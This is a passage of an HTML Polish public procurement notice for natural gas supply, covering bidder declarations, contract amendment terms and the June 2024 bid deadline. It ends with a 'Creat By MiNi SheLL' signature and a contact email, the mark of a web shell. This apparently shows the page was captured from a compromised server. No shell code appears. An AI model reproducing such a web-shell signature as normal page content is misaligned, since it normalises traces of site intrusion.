postępowaniu na dzień składania ofert, <br/> tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe <br/> środki dowodowe, o ile są wymagane. Jeżeli nie są wymagane przez <br/> Zamawiającego, wystarczającym jest złożenie ww. oświadczenia.<br/>10.3. W przypadku wspólnego ubiegania się przez Wykonawców o <br/> zamówienie, oświadczenie, o którym mowa w pkt 10.2. składa każdy z <br/> Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia <br/> oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim <br/> każdy z Wykonawców wykazuje spełnianie warunków udziału w <br/> postępowaniu.<br/>10.4. W przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji <br/> podmiotów udostępniających zasoby, Wykonawca przedstawia wraz z <br/> oświadczeniem, o którym mowa w pkt 10.2., także oświadczenie <br/> podmiotu udostępniającego zasoby, potwierdzające brak podstaw <br/> wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków <br/> udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się <br/> na jego zasoby.<br/>10.5. Oświadczenia, o których mowa w pkt. 10.2.- 10.4. powyżej, składa się <br/> wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej opatrzonej (podpisanej) kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonym podpisem zaufanym (ePUAP) lub elektronicznym podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach: .txt, .rtf, .pdf, .doc, .docx, .odt. Do przygotowania oferty zaleca się skorzystanie z Formularza oferty, stanowiącego Załącznik nr 1 do SWZ. W przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza oferty, oferta powinna zawierać wszystkie informacje – treści - wymagane we wzorze udostępnionego przez Zamawiającego wzoru Formularza oferty. Jako ofertę Wykonawca składa następujące dokumenty:<br/>1) wypełniony i podpisany Formularz ofertowy – wg wzoru stanowiącego <br/> Załącznik nr 1 do SWZ;<br/>2) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków <br/> udziału w postępowaniu w zakresie wskazanym w SWZ – wg wzoru <br/> stanowiącego Załącznik nr 2 do SWZ;<br/>3) pełnomocnictwo (jeżeli dotyczy);<br/>4) zobowiązanie podmiotu trzeciego do udostępnienia zasobów (jeżeli dotyczy, wzór własny Wykonawcy).<br/>10.2. Oświadczenie o spełnianiu warunków udziału i braku podstaw do <br/> wykluczenia, stanowi dowód potwierdzający brak podstaw wykluczenia <br/> i spełnianie warunków udziału w postępowaniu na dzień składania <br/> ofert, tymczasowo zastępujący wymagane przez Zamawiającego <br/> podmiotowe środki dowodowe, o ile są wymagane. Jeżeli nie są <br/> wymagane przez Zamawiającego, wystarczającym jest złożenie ww. <br/> oświadczenia.<br/>10.3. W przypadku wspólnego ubiegania się przez Wykonawców o <br/> zamówienie, oświadczenie, o którym mowa w pkt 10.2. składa każdy z <br/> Wykonawców. Oświadczenia te potwierdzają brak podstaw <br/> wykluczenia oraz spełnianie warunków udziału w postępowaniu w <br/> zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków <br/> udziału w postępowaniu.<br/>10.4. W przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji <br/> podmiotów udostępniających zasoby, Wykonawca przedstawia wraz z <br/> oświadczeniem, o którym mowa w pkt 10.2., także oświadczenie <br/> podmiotu udostępniającego zasoby, potwierdzające brak podstaw <br/> wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków <br/> udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się <br/> na jego zasoby.<br/>10.5. Oświadczenia, o których mowa w pkt. 10.2.- 10.4. powyżej, składa się <br/> wraz z ofertą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 ustawy Pzp, w oparciu o następujące okoliczności:<br/>1) Zmiany ceny netto paliwa gazowego w związku ze zmianą kwalifikacji w <br/> zakresie podatku akcyzowego,<br/>2) Zmiany ceny netto paliwa gazowego w związku ze zmianą przeznaczenia <br/> paliwa gazowego (art. 62 b ustawy Pe),<br/>3) Zmiany stawek i cen za usługi dystrybucji w przypadku zatwierdzenia przez <br/> Prezesa URE zmiany Taryfy na usługi przesyłu gazu OSD, które miałyby <br/> obowiązywać w okresie obowiązywania Umowy, bądź w przypadku zmiany <br/> mocy lub zmiany grupy taryfowej, jeżeli punkt odbioru zostanie <br/> zakwalifikowany do innej grupy taryfowej,<br/>4) Ustawowej zmiany stawki podatku VAT i / lub Ustawowej zmiany <br/> opodatkowania podatkiem akcyzowym, w wyniku czego<br/> zmianie ulegnie cena jednostkowa netto/brutto paliwa gazowego<br/>5) Zmiany Taryfy stosowanej dla odbiorców w gospodarstwie domowym <br/> (dotyczy paliwa gazowego objętego ochroną taryfową)<br/>2. W okolicznościach, o których mowa w ust. 1 pkt 1-5) powyżej zmiana <br/> Umowy obejmować zmianę w zakresie wysokości stawek opisanych w ust. <br/> 1 pkt 1-5) powyżej o kwoty wynikającej ze zmiany tych stawek. Zmiany, o <br/> których mowa w ust. 1 pkt 1-5) powyżej obowiązywać będą od dnia wejścia <br/> w życie przepisów powodujących zmiany wymienione w ust. 1 pkt 1-5)<br/> powyżej i nie wymagają zawarcia Aneksu.<br/>3. Strony dopuszczają zmianę Umowy również w następującym zakresie:<br/> 1) Zmiany ilości punktów odbioru wskazanych w Załączniku nr 1 do <br/> Umowy, przy czym zmiana wynikać może np. z<br/> likwidacji/włączenia punktu odbioru, zmiany stanu prawnego lub <br/> technicznego punktu odbioru, zmiany w zakresie odbiorcy,<br/> zaistnienia przeszkód prawnych i formalnych uniemożliwiających <br/> przeprowadzenie procedury zmiany sprzedawcy, w tym w<br/> przypadku zaistnienia nieprzewidzianych przeszkód uniemożliwiających <br/> rozwiązanie dotychczas obowiązujących umów.<br/> Dostawa paliwa gazowego do PPG podlegającego wyłączeniu z umowy <br/> zostanie zakończona w terminie uzgodnionym<br/> przez Strony. Zmiana ilości gazu wynikająca ze zwiększenia ilości <br/> punktów odbioru nie przekroczy 10% łącznej<br/> prognozowanej ilości paliwa gazowego, o której mowa w §5 ust. 1 <br/> Umowy,<br/>2) Zmiany mocy umownej w związku ze zmianą zapotrzebowania na paliwo <br/> gazowe, pod warunkiem pod warunkiem wyrażenia zgody przez OSD,<br/>3) Zmiany grupy taryfowej dokonanej (niezależnie od Zamawiającego / <br/> Odbiorcy) przez PSG zgodnie z postanowieniami Taryfy OSD,<br/>4) Zmiany terminu rozpoczęcia dostaw gazu ziemnego do poszczególnych <br/> punktów odbioru, jeżeli zmiana ta wynika z przedłużającej się procedury <br/> zmiany sprzedawcy lub procesu rozwiązania dotychczasowych umów <br/> kompleksowych lub z przyczyn niezależnych od Stron. W przypadku <br/> zaistnienia okoliczności, o których mowa w pkt 2 i 3 Wykonawca stosować <br/> będzie stawki i opłaty właściwe dla danej grupy taryfowej / mocy umownej.<br/>4. W przypadku zaistnienia okoliczności, o których mowa w ust. 3 pkt 2) i 3) <br/> powyżej, Wykonawca stosować będzie stawki i opłaty właściwe dla danej <br/> grupy taryfowej / mocy umownej. Pełną treść możliwych zmian w Umowie <br/> określa Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-12 15:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie zakupowej pod adresem https://instytutskrzynki.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-12 16:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com